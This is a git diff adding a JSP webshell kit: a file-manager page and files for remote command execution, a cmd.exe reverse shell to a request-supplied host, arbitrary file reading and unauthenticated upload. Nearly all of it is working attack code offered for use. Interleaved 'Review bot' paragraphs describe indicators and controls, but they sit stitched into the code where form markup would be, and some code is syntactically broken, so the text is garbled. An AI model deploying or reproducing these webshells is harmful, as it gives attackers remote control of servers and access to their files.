    + "> +
    +
    + + +<% + } + } + // Save or cancel the edited file + else if (request.getParameter("nfile") != null) { + File f = new File(request.getParameter("nfile")); + File new_f = new File(getDir(f.getParent(), request.getParameter("new_name"))); + if (!isAllowed(new_f)){ + request.setAttribute("error", "You are not allowed to access " + new_f.getAbsolutePath()); + } + else if (request.getParameter("Submit").equals("Save")) { + if (new_f.exists() && new_f.canWrite() && request.getParameter("Backup") != null) { + File bak = new File(new_f.getAbsolutePath() + ".bak"); + bak.delete(); + new_f.renameTo(bak); + } + if (new_f.exists() && !new_f.canWrite()) request.setAttribute("error", + "Cannot write to " + new_f.getName() + ", file is write protected."); + else { + BufferedWriter outs = new BufferedWriter(new FileWriter(new_f)); + StringReader text = new StringReader(request.getParameter("text")); + int i; + boolean cr = false; + String lineend = "\n"; + if (request.getParameter("lineformat").equals("dos")) lineend = "\r\n"; + while ((i = text.read()) >= 0) { + if (i == '\r') cr = true; + else if (i == '\n') { + outs.write(lineend); + cr = false; + } + else if (cr) { + outs.write(lineend); + cr = false; + } + else { + outs.write(i); + cr = false; + } + } + outs.flush(); + outs.close(); + } + } + request.setAttribute("dir", f.getParent()); + } + //Unpack file to the current directory without overwriting + else if (request.getParameter("unpackfile") != null) { + File f = new File(request.getParameter("unpackfile")); + String root = f.getParent(); + request.setAttribute("dir", root); + if (!isAllowed(new File(root))){ + request.setAttribute("error", "You are not allowed to access " + root); + } + //Check if file exists + else if (!f.exists()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", file does not exist"); + } + //Check if directory is readonly + else if (!f.getParentFile().canWrite()) { + request.setAttribute("error", "Cannot unpack " + 
f.getName() + + ", directory is write protected."); + } + //GZip + else if (f.getName().toLowerCase().endsWith(".gz")) { + //New name is old Name without .gz + String newName = f.getAbsolutePath().substring(0, f.getAbsolutePath().length() - 3); + try { + byte buffer[] = new byte[0xffff]; + copyStreams(new GZIPInputStream(new FileInputStream(f)), new FileOutputStream( + newName), buffer); + } + catch (IOException ex) { + request.setAttribute("error", "Unpacking of " + f.getName() + + " aborted. Error: " + ex); + } + } + //Else try Zip + else { + try { + ZipFile zf = new ZipFile(f); + Enumeration entries = zf.entries(); + //First check whether a file already exist + boolean error = false; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + if (!entry.isDirectory() + && new File(root + File.separator + entry.getName()).exists()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", File " + entry.getName() + " already exists."); + error = true; + break; + } + } + if (!error) { + //Unpack File + entries = zf.entries(); + byte buffer[] = new byte[0xffff]; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + File n = new File(root + File.separator + entry.getName()); + if (entry.isDirectory()) n.mkdirs(); + else { + n.getParentFile().mkdirs(); + n.createNewFile(); + copyStreams(zf.getInputStream(entry), new FileOutputStream(n), + buffer); + } + } + zf.close(); + request.setAttribute("message", "Unpack of " + f.getName() + + " was successful."); + } + } + catch (ZipException ex) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", no valid zip file"); + } + catch (IOException ex) { + request.setAttribute("error", "Unpacking of " + f.getName() + + " aborted. 
Error: " + ex); + } + } + } + // Delete Files + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(DELETE_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + boolean error = false; + //delete backwards + for (int i = v.size() - 1; i >= 0; i--) { + File f = (File) v.get(i); + if (!isAllowed(f)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + error = true; + break; + } + if (!f.canWrite() || !f.delete()) { + request.setAttribute("error", "Cannot delete " + f.getAbsolutePath() + + ". Deletion aborted"); + error = true; + break; + } + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files deleted"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File deleted"); + else if (!error) request.setAttribute("error", "No files selected"); + } + // Create Directory + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(CREATE_DIR))) { + String dir = "" + request.getAttribute("dir"); + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir))){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else if (new File(new_dir).mkdirs()) { + request.setAttribute("message", "Directory created"); + } + else request.setAttribute("error", "Creation of directory " + new_dir + " failed"); + } + // Create a new empty file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(CREATE_FILE))) { + String dir = "" + request.getAttribute("dir"); + String file_name = request.getParameter("cr_dir"); + String new_file = getDir(dir, file_name); + if (!isAllowed(new File(new_file))){ + request.setAttribute("error", "You are not allowed to access " + new_file); + } + // Test, if file_name is empty + else if (!"".equals(file_name.trim()) && 
!file_name.endsWith(File.separator)) { + if (new File(new_file).createNewFile()) request.setAttribute("message", + "File created"); + else request.setAttribute("error", "Creation of file " + new_file + " failed"); + } + else request.setAttribute("error", "Error: " + file_name + " is not a valid filename"); + } + // Rename a file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(RENAME_FILE))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = "" + request.getAttribute("dir"); + String new_file_name = request.getParameter("cr_dir"); + String new_file = getDir(dir, new_file_name); + if (!isAllowed(new File(new_file))){ + request.setAttribute("error", "You are not allowed to access " + new_file); + } + // The error conditions: + // 1) Zero Files selected + else if (v.size() <= 0) request.setAttribute("error", + "Select exactly one file or folder. Rename failed"); + // 2a) Multiple files selected and the first isn't a dir + // Here we assume that expandFileList builds v from top-bottom, starting with the dirs + else if ((v.size() > 1) && !(((File) v.get(0)).isDirectory())) request.setAttribute( + "error", "Select exactly one file or folder. Rename failed"); + // 2b) If there are multiple files from the same directory, rename fails + else if ((v.size() > 1) && ((File) v.get(0)).isDirectory() + && !(((File) v.get(0)).getPath().equals(((File) v.get(1)).getParent()))) { + request.setAttribute("error", "Select exactly one file or folder. 
Rename failed"); + } + else { + File f = (File) v.get(0); + if (!isAllowed(f)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + // Test, if file_name is empty + else if ((new_file.trim() != "") && !new_file.endsWith(File.separator)) { + if (!f.canWrite() || !f.renameTo(new File(new_file.trim()))) { + request.setAttribute("error", "Creation of file " + new_file + " failed"); + } + else request.setAttribute("message", "Renamed file " + + ((File) v.get(0)).getName() + " to " + new_file); + } + else request.setAttribute("error", "Error: \"" + new_file_name + + "\" is not a valid filename"); + } + } + // Move selected file(s) + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(MOVE_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = "" + request.getAttribute("dir"); + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir))){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else{ + boolean error = false; + // This ensures that new_dir is a directory + if (!new_dir.endsWith(File.separator)) new_dir += File.separator; + for (int i = v.size() - 1; i >= 0; i--) { + File f = (File) v.get(i); + if (!isAllowed(f)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + error = true; + break; + } + else if (!f.canWrite() || !f.renameTo(new File(new_dir + + f.getAbsolutePath().substring(dir.length())))) { + request.setAttribute("error", "Cannot move " + f.getAbsolutePath() + + ". 
Move aborted"); + error = true; + break; + } + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files moved"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File moved"); + else if (!error) request.setAttribute("error", "No files selected"); + } + } + // Copy Files + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(COPY_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = (String) request.getAttribute("dir"); + if (!dir.endsWith(File.separator)) dir += File.separator; + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir))){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else{ + boolean error = false; + if (!new_dir.endsWith(File.separator)) new_dir += File.separator; + try { + byte buffer[] = new byte[0xffff]; + for (int i = 0; i < v.size(); i++) { + File f_old = (File) v.get(i); + File f_new = new File(new_dir + f_old.getAbsolutePath().substring(dir.length())); + if (!isAllowed(f_old)|| !isAllowed(f_new)){ + request.setAttribute("error", "You are not allowed to access " + f_new.getAbsolutePath()); + error = true; + } + else if (f_old.isDirectory()) f_new.mkdirs(); + // Overwriting is forbidden + else if (!f_new.exists()) { + copyStreams(new FileInputStream(f_old), new FileOutputStream(f_new), buffer); + } + else { + // File exists + request.setAttribute("error", "Cannot copy " + f_old.getAbsolutePath() + + ", file already exists. Copying aborted"); + error = true; + break; + } + } + } + catch (IOException e) { + request.setAttribute("error", "Error " + e + ". 
Copying aborted"); + error = true; + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files copied"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File copied"); + else if (!error) request.setAttribute("error", "No files selected"); + } + } + // Directory viewer + if (dir_view && request.getAttribute("dir") != null) { + File f = new File("" + request.getAttribute("dir")); + //Check, whether the dir exists + if (!f.exists() || !isAllowed(f)) { + if (!f.exists()){ + request.setAttribute("error", "Directory " + f.getAbsolutePath() + " does not exist."); + } + else{ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + //if attribute olddir exists, it will change to olddir + if (request.getAttribute("olddir") != null && isAllowed(new File((String) request.getAttribute("olddir")))) { + f = new File("" + request.getAttribute("olddir")); + } + //try to go to the parent dir + else { + if (f.getParent() != null && isAllowed(f)) f = new File(f.getParent()); + } + //If this dir also do also not exist, go back to browser.jsp root path + if (!f.exists()) { + String path = null; + if (application.getRealPath(request.getRequestURI()) != null) path = new File( + application.getRealPath(request.getRequestURI())).getParent(); + + if (path == null) // handle the case were we are not in a directory (ex: war file) + path = new File(".").getAbsolutePath(); + f = new File(path); + } + if (isAllowed(f)) request.setAttribute("dir", f.getAbsolutePath()); + else request.setAttribute("dir", null); + } +%> + +<%=request.getAttribute("dir")%> + + +<% + //Output message + if (request.getAttribute("message") != null) { + out.println("
    "); + out.println(request.getAttribute("message")); + out.println("
    "); + } + //Output error + if (request.getAttribute("error") != null) { + out.println("
    "); + out.println(request.getAttribute("error")); + out.println("
    "); + } + if (request.getAttribute("dir") != null){ +%> +
    + +<% + // Output the table, starting with the headers. + String dir = URLEncoder.encode("" + request.getAttribute("dir")); + String cmd = browser_name + "?dir=" + dir; + int sortMode = 1; + if (request.getParameter("sort") != null) sortMode = Integer.parseInt(request + .getParameter("sort")); + int[] sort = new int[] {1, 2, 3, 4}; + for (int i = 0; i < sort.length; i++) + if (sort[i] == sortMode) sort[i] = -sort[i]; + out.println("" + + "" + + "" + + "" + + ""); + char trenner = File.separatorChar; + // Output the Root-Dirs, without FORBIDDEN_DRIVES + File[] entry = File.listRoots(); + for (int i = 0; i < entry.length; i++) { + boolean forbidden = false; + for (int i2 = 0; i2 < FORBIDDEN_DRIVES.length; i2++) { + if (entry[i].getAbsolutePath().toLowerCase().equals(FORBIDDEN_DRIVES[i2])) forbidden = true; + } + if (!forbidden) { + out.println(""); + out.println(""); + } + } + // Output the parent directory link ".." + if (f.getParent() != null) { + out.println(""); + out.println(""); + } + // Output all files and dirs and calculate the number of files and total size + entry = f.listFiles(); + if (entry == null) entry = new File[] {}; + long totalSize = 0; // The total size of the files in the current directory + long fileCount = 0; // The count of files in the current working directory + if (entry != null && entry.length > 0) { + Arrays.sort(entry, new FileComp(sortMode)); + for (int i = 0; i < entry.length; i++) { + String name = URLEncoder.encode(entry[i].getAbsolutePath()); + String type = "File"; // This String will tell the extension of the file + if (entry[i].isDirectory()) type = "DIR"; // It's a DIR + else { + String tempName = entry[i].getName().replace(' ', '_'); + if (tempName.lastIndexOf('.') != -1) type = tempName.substring( + tempName.lastIndexOf('.')).toLowerCase(); + } + String ahref = ""; + String link = buf; // The standard view link, uses Mime-type + if (entry[i].isDirectory()) { + if (entry[i].canRead() && USE_DIR_PREVIEW) { + //Show the 
first DIR_PREVIEW_NUMBER directory entries in a tooltip + File[] fs = entry[i].listFiles(); + if (fs == null) fs = new File[] {}; + Arrays.sort(fs, new FileComp()); + StringBuffer filenames = new StringBuffer(); + for (int i2 = 0; (i2 < fs.length) && (i2 < 10); i2++) { + String fname = conv2Html(fs[i2].getName()); + if (fs[i2].isDirectory()) filenames.append("[" + fname + "];"); + else filenames.append(fname + ";"); + } + if (fs.length > DIR_PREVIEW_NUMBER) filenames.append("..."); + else if (filenames.length() > 0) filenames + .setLength(filenames.length() - 1); + link = ahref + "dir=" + name + "\" title=\"" + filenames + "\">" + + FOL_IMG + "[" + buf + "]"; + } + else if (entry[i].canRead()) { + link = ahref + "dir=" + name + "\">" + FOL_IMG + "[" + buf + "]"; + } + else link = FOL_IMG + "[" + buf + "]"; + } + else if (entry[i].isFile()) { //Entry is file + totalSize = totalSize + entry[i].length(); + fileCount = fileCount + 1; + if (entry[i].canRead()) { + dlink = ahref + "downfile=" + name + "\">Download"; + //If you click at the filename + if (USE_POPUP) link = ahref + "file=" + name + "\" target=\"_blank\">" + + buf + ""; + else link = ahref + "file=" + name + "\">" + buf + ""; + if (entry[i].canWrite()) { // The file can be edited + //If it is a zip or jar File you can unpack it + if (isPacked(name, true)) elink = ahref + "unpackfile=" + name + + "\">Unpack"; + else elink = ahref + "editfile=" + name + "\">Edit"; + } + else { // If the file cannot be edited + //If it is a zip or jar File you can unpack it + if (isPacked(name, true)) elink = ahref + "unpackfile=" + name + + "\">Unpack"; + else elink = ahref + "editfile=" + name + "\">View"; + } + } + else { + link = buf; + } + } + String date = dateFormat.format(new Date(entry[i].lastModified())); + out.println(""); + if (entry[i].canRead()) { + out + .println(""); + } + else { + out + .println(""); + } + out.print(""); + if (entry[i].isDirectory()) out.print(""); + else { + out.print(""); + } + 
out.println(""); // The edit link (or view, depending) + } + }%> +
     NameSizeTypeDate  
     "); + String name = URLEncoder.encode(entry[i].getAbsolutePath()); + String buf = entry[i].getAbsolutePath(); + out.println("  [" + buf + "]"); + out + .println("     
    "); + out.println("  " + FOL_IMG + "[..]"); + out + .println("     
     " + link + " " + + convertFileSize(entry[i].length()) + "" + type + "  " + // The file type (extension) + date + "" + // The date the file was created + dlink + "" + // The download link + elink + "
    + Select all +

    + + <%=convertFileSize(totalSize)%> in <%=fileCount%> files in <%= dir2linkdir((String) request.getAttribute("dir"), browser_name, sortMode)%> + +

    +

    + "> + + + +

    +

    + + + + + + +

    +
    +
    + "> + + + +
    + <% if (NATIVE_COMMANDS){%> +
    + "> + + + +
    <% + } + }%> +
    +
    + jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
    + +<% + } +%> \ No newline at end of file diff --git a/jsp/hackk8/jsp2/cmd.jsp b/jsp/hackk8/jsp2/cmd.jsp new file mode 100644 index 0000000..6357276 --- /dev/null +++ b/jsp/hackk8/jsp2/cmd.jsp @@ -0,0 +1,35 @@ +<%@ page import="java.util.*,java.io.*"%> +<% +// +// JSP_KIT +// +// cmd.jsp = Command Execution (unix) +// +// by: Unknown +// modified: 27/06/2003 +// +%> + +
    + + +
    +
    +<%
    +if (request.getParameter("cmd") != null) {
    +        out.println("Command: " + request.getParameter("cmd") + "
    "); + Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); + OutputStream os = p.getOutputStream(); + InputStream in = p.getInputStream(); + DataInputStream dis = new DataInputStream(in); + String disr = dis.readLine(); + while ( disr != null ) { + out.println(disr); + disr = dis.readLine(); + } + } +%> +
    + + + diff --git a/jsp/hackk8/jsp2/cmdjsp.jsp b/jsp/hackk8/jsp2/cmdjsp.jsp new file mode 100644 index 0000000..63625af --- /dev/null +++ b/jsp/hackk8/jsp2/cmdjsp.jsp @@ -0,0 +1,32 @@ +// note that linux = cmd and windows = "cmd.exe /c + cmd" + +
    + + +
    + +<%@ page import="java.io.*" %> +<% + String cmd = request.getParameter("cmd"); + String output = ""; + + if(cmd != null) { + String s = null; + try { + Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd); + BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); + while((s = sI.readLine()) != null) { + output += s; + } + } + catch(IOException e) { + e.printStackTrace(); + } + } +%> + +
    +<%=output %>
    +
    + + diff --git a/jsp/hackk8/jsp2/jsp-reverse.jsp b/jsp/hackk8/jsp2/jsp-reverse.jsp new file mode 100644 index 0000000..ae9a781 --- /dev/null +++ b/jsp/hackk8/jsp2/jsp-reverse.jsp @@ -0,0 +1,91 @@ +// backdoor.jsp +// http://www.security.org.sg/code/jspreverse.html + +<%@ +page import="java.lang.*, java.util.*, java.io.*, java.net.*" +% > +<%! +static class StreamConnector extends Thread +{ + InputStream is; + OutputStream os; + + StreamConnector(InputStream is, OutputStream os) + { + this.is = is; + this.os = os; + } + + public void run() + { + BufferedReader isr = null; + BufferedWriter osw = null; + + try + { + isr = new BufferedReader(new InputStreamReader(is)); + osw = new BufferedWriter(new OutputStreamWriter(os)); + + char buffer[] = new char[8192]; + int lenRead; + + while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0) + { + osw.write(buffer, 0, lenRead); + osw.flush(); + } + } + catch (Exception ioe) + + try + { + if(isr != null) isr.close(); + if(osw != null) osw.close(); + } + catch (Exception ioe) + } +} +%> + +

    JSP Backdoor Reverse Shell

    + +
    +IP Address + +Port + + +
    +

    +


    + +<% +String ipAddress = request.getParameter("ipaddress"); +String ipPort = request.getParameter("port"); + +if(ipAddress != null && ipPort != null) +{ + Socket sock = null; + try + { + sock = new Socket(ipAddress, (new Integer(ipPort)).intValue()); + + Runtime rt = Runtime.getRuntime(); + Process proc = rt.exec("cmd.exe"); + + StreamConnector outputConnector = + new StreamConnector(proc.getInputStream(), + sock.getOutputStream()); + + StreamConnector inputConnector = + new StreamConnector(sock.getInputStream(), + proc.getOutputStream()); + + outputConnector.start(); + inputConnector.start(); + } + catch(Exception e) +} +%> + + diff --git a/jsp/hackk8/jsp2/list.jsp b/jsp/hackk8/jsp2/list.jsp new file mode 100644 index 0000000..eb0db3a --- /dev/null +++ b/jsp/hackk8/jsp2/list.jsp @@ -0,0 +1,77 @@ +<%@ page import="java.util.*,java.io.*"%> +<% +// +// JSP_KIT +// +// list.jsp = Directory & File View +// +// by: Sierra +// modified: 27/06/2003 +// +%> +<% +if(request.getParameter("file")==null) { + %> + +
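Review bot: The scriptlet opens a `Socket` to the `ipaddress` and `port` request parameters and joins it to a `cmd.exe` process through two `StreamConnector` threads, with no access check on the page. The `// backdoor.jsp` and URL lines sit before the `<%@ page` directive, so they appear to be template text that is sent in the response rather than comments, which is worth recording as a content indicator. I would document both facts in a JSP comment at the top, for example `<%-- SAMPLE: reverse-shell page; indicators: container JVM spawning cmd.exe, outbound connection to a request-supplied host --%>`. Egress filtering on the application server and process-lineage alerting are the controls that address this behaviour.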
    + + +
    + <% + } +%> +<% //read the file name. +try { +File f = new File(request.getParameter("file")); +if(f.isDirectory()) { + int i; + String fname = new String("Unknown"); + String fcolor = new String("Black"); + %> + + + <% + out.print("Path: " + f.toString() + "

    "); + File flist[] = f.listFiles(); + for(i=0; i" + fname.toString() + " " + "( Size: " + flist[i].length() + " bytes)
    \n"); + } + %> +
    + <% + + } else { + if(f.canRead() == true) { + InputStream in = new FileInputStream(f); + ServletOutputStream outs = response.getOutputStream(); + int left = 0; + try { + while((left) >= 0 ) { + left = in.read(); + outs.write(left); + } + } catch(IOException ex) {ex.printStackTrace();} + outs.flush(); + outs.close(); + in.close(); + } else { + out.print("Can't Read file
    "); + } + } +} catch(Exception ex) {ex.printStackTrace();} +%> \ No newline at end of file diff --git a/jsp/hackk8/jsp2/up.jsp b/jsp/hackk8/jsp2/up.jsp new file mode 100644 index 0000000..5df5d0d --- /dev/null +++ b/jsp/hackk8/jsp2/up.jsp @@ -0,0 +1,162 @@ + +<%@ page import="java.io.*,java.util.*,javax.servlet.*" %> +<% +// +// JSP_KIT +// +// up.jsp = File Upload (unix) +// +// by: Unknown +// modified: 27/06/2003 +// +%> + +
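Review bot: `new File(request.getParameter("file"))` is used with no base-directory restriction or access check, so the page lists or streams any path the container account can read, and `f.toString()` is printed into the HTML unescaped. The read loop `left = in.read(); outs.write(left);` also writes the `-1` end-of-file value, so each served copy appears to carry one extra trailing `0xFF` byte and will not hash-match the file on disk, which matters when comparing recovered copies during an investigation. I would record this next to the loop, `// analysis note: EOF value is written too, served copy = original + one 0xFF byte`. Requests carrying a `file=` parameter with absolute paths are the access-log pattern this page produces.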
    + + +
    + +<%! +public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{ + String boundary = null; + Enumeration enum = request.getHeaderNames(); + while(enum.hasMoreElements()){ + String header = (String)enum.nextElement(); + String hvalue = request.getHeader(header); + prop.setProperty((header).toLowerCase(),hvalue); + if("content-type".equalsIgnoreCase(header) ){ + int idx = hvalue.lastIndexOf("boundary="); + if(idx != -1 ){ + boundary= hvalue.substring(idx+9 , hvalue.length()); + } + } + } + return boundary; + +} +public String getFileName(String secondline){ + int len = secondline.length(); + int idx = secondline.lastIndexOf("filename="); + if(idx == -1 ) return null; + String filename = secondline.substring(idx+10 , len-1); + filename = filename.replace('\\','/'); + idx = filename.lastIndexOf("/"); + idx = idx + 1; + filename = filename.substring( idx ); + return filename; +} +%> +<% +String DPATH = "/tmp/"; +int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks +int MAXSIZE = 10; // 10 Mega Byte +String boundary = getBoundary(request,prop); +if(boundary == null ){ + boundary = prop.getProperty("boundary"); + }else{ + boundary = "--"+boundary; + } +if(boundary == null ){ + return; + } +Long contentsize = new Long(prop.getProperty("content-length","0")); +int c; +StringWriter st = new StringWriter(); +if(contentsize.longValue() < 1L ){ + return; + } +long l = contentsize.longValue() - ROUGHSIZE; +int KB = 1024; +int MB = 1024 * KB; +int csize = (int)(l / MB); +if(csize > MAXSIZE ){ + return; + } +ServletInputStream fin = request.getInputStream(); +int cn; +int count=0; +while((c=fin.read()) != -1 ){ + if( c == '\r') break; + st.write(c); + count++; + } +c=fin.read(); +String tboundary = st.getBuffer().toString(); +tboundary=tboundary.trim(); +if(! 
tboundary.equalsIgnoreCase( boundary) ){ + return; + } +st.close(); +st = null; +st = new StringWriter(); +while((c=fin.read()) != -1 ){ + if( c == '\r' ) break; + st.write(c); + } +c=fin.read(); +String secondline = st.getBuffer().toString(); +String filename = getFileName(secondline); +st.close(); +st = null; +st = new StringWriter(); +while((c=fin.read()) != -1 ){ + if( c == '\r' ) break; + st.write( c ); + } +c=fin.read(); + +fin.read(); +fin.read(); +File newfile = null; +FileOutputStream fout =null; +try{ + if(filename == null) throw new FileNotFoundException("File Name not found"); + newfile = new File(DPATH+filename); + fout = new FileOutputStream( newfile ); + }catch(FileNotFoundException fnexp){ + fin.close(); + return; + } + +byte b[] = null; +while(l > 1024L){ + b = new byte[1024]; + fin.read(b,0,1024); + fout.write(b); + b=null; + l -= 1024L; + } +if(l > 0){ + b = new byte[(int)l]; + fin.read(b,0,(int)l); + fout.write(b); + } + + +ByteArrayOutputStream baos = new ByteArrayOutputStream(); +while((c = fin.read()) != -1){ + baos.write(c); + } +String laststring = baos.toString(); +int idx = laststring.indexOf(boundary); +b = baos.toByteArray(); +if(idx > 2){ + fout.write(b,0,idx-2); + }else{ + fout.close(); + newfile.delete(); + return; + } +fout.flush(); +fout.close(); +fin.close(); + +out.println("FileName: " + newfile.getName()); +out.println("FileSize: " + newfile.length()); + +%> + + + + + diff --git a/jsp/hackk8/jsp2/win32/cmd_win32.jsp b/jsp/hackk8/jsp2/win32/cmd_win32.jsp new file mode 100644 index 0000000..21f2bdc --- /dev/null +++ b/jsp/hackk8/jsp2/win32/cmd_win32.jsp @@ -0,0 +1,31 @@ +<%@ page import="java.util.*,java.io.*,java.net.*"%> +<% +// +// JSP_KIT +// +// cmd.jsp = Command Execution (win32) +// +// by: Unknown +// modified: 27/06/2003 +// +%> + +
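Review bot: The upload scriptlet trusts two client-supplied values: the name from the `filename=` part header, which `getFileName` reduces to the text after the last `/` before it is appended to `DPATH`, and the `content-length` header, which alone drives the `MAXSIZE` check and the read lengths. There is no access check or file-type restriction, so any caller can write a file into `/tmp/` here, or into the `"c:\\"` location in `win32/up_win32.jsp`, which is otherwise identical. The only comment on the size logic is in Spanish; I would replace it with `// BUG: truncates the file if it is larger than 640 KB` and add `// SAMPLE: unauthenticated upload page, kept for analysis; never deploy` to the banner. New files created in those directories by the servlet container account are the host-side indicator.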
    + + +
    +
    +<%
    +if (request.getParameter("cmd") != null) {
    +        out.println("Command: " + request.getParameter("cmd") + "\n
    "); + Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd")); + OutputStream os = p.getOutputStream(); + InputStream in = p.getInputStream(); + DataInputStream dis = new DataInputStream(in); + String disr = dis.readLine(); + while ( disr != null ) { + out.println(disr); disr = dis.readLine(); } + } +%> +
    + \ No newline at end of file diff --git a/jsp/hackk8/jsp2/win32/up_win32.jsp b/jsp/hackk8/jsp2/win32/up_win32.jsp new file mode 100644 index 0000000..ff977ac --- /dev/null +++ b/jsp/hackk8/jsp2/win32/up_win32.jsp @@ -0,0 +1,162 @@ + +<%@ page import="java.io.*,java.util.*,javax.servlet.*" %> +<% +// +// JSP_KIT +// +// up.jsp = File Upload (win32) +// +// by: Unknown +// modified: 27/06/2003 +// +%> + +
    + + +
    + +<%! +public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{ + String boundary = null; + Enumeration enum = request.getHeaderNames(); + while(enum.hasMoreElements()){ + String header = (String)enum.nextElement(); + String hvalue = request.getHeader(header); + prop.setProperty((header).toLowerCase(),hvalue); + if("content-type".equalsIgnoreCase(header) ){ + int idx = hvalue.lastIndexOf("boundary="); + if(idx != -1 ){ + boundary= hvalue.substring(idx+9 , hvalue.length()); + } + } + } + return boundary; + +} +public String getFileName(String secondline){ + int len = secondline.length(); + int idx = secondline.lastIndexOf("filename="); + if(idx == -1 ) return null; + String filename = secondline.substring(idx+10 , len-1); + filename = filename.replace('\\','/'); + idx = filename.lastIndexOf("/"); + idx = idx + 1; + filename = filename.substring( idx ); + return filename; +} +%> +<% +String DPATH = "c:\\"; +int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks +int MAXSIZE = 10; // 10 Mega Byte +String boundary = getBoundary(request,prop); +if(boundary == null ){ + boundary = prop.getProperty("boundary"); + }else{ + boundary = "--"+boundary; + } +if(boundary == null ){ + return; + } +Long contentsize = new Long(prop.getProperty("content-length","0")); +int c; +StringWriter st = new StringWriter(); +if(contentsize.longValue() < 1L ){ + return; + } +long l = contentsize.longValue() - ROUGHSIZE; +int KB = 1024; +int MB = 1024 * KB; +int csize = (int)(l / MB); +if(csize > MAXSIZE ){ + return; + } +ServletInputStream fin = request.getInputStream(); +int cn; +int count=0; +while((c=fin.read()) != -1 ){ + if( c == '\r') break; + st.write(c); + count++; + } +c=fin.read(); +String tboundary = st.getBuffer().toString(); +tboundary=tboundary.trim(); +if(! 
tboundary.equalsIgnoreCase( boundary) ){ + return; + } +st.close(); +st = null; +st = new StringWriter(); +while((c=fin.read()) != -1 ){ + if( c == '\r' ) break; + st.write(c); + } +c=fin.read(); +String secondline = st.getBuffer().toString(); +String filename = getFileName(secondline); +st.close(); +st = null; +st = new StringWriter(); +while((c=fin.read()) != -1 ){ + if( c == '\r' ) break; + st.write( c ); + } +c=fin.read(); + +fin.read(); +fin.read(); +File newfile = null; +FileOutputStream fout =null; +try{ + if(filename == null) throw new FileNotFoundException("File Name not found"); + newfile = new File(DPATH+filename); + fout = new FileOutputStream( newfile ); + }catch(FileNotFoundException fnexp){ + fin.close(); + return; + } + +byte b[] = null; +while(l > 1024L){ + b = new byte[1024]; + fin.read(b,0,1024); + fout.write(b); + b=null; + l -= 1024L; + } +if(l > 0){ + b = new byte[(int)l]; + fin.read(b,0,(int)l); + fout.write(b); + } + + +ByteArrayOutputStream baos = new ByteArrayOutputStream(); +while((c = fin.read()) != -1){ + baos.write(c); + } +String laststring = baos.toString(); +int idx = laststring.indexOf(boundary); +b = baos.toByteArray(); +if(idx > 2){ + fout.write(b,0,idx-2); + }else{ + fout.close(); + newfile.delete(); + return; + } +fout.flush(); +fout.close(); +fin.close(); + +out.println("FileName: " + newfile.getName()); +out.println("FileSize: " + newfile.length()); + +%> + + + + +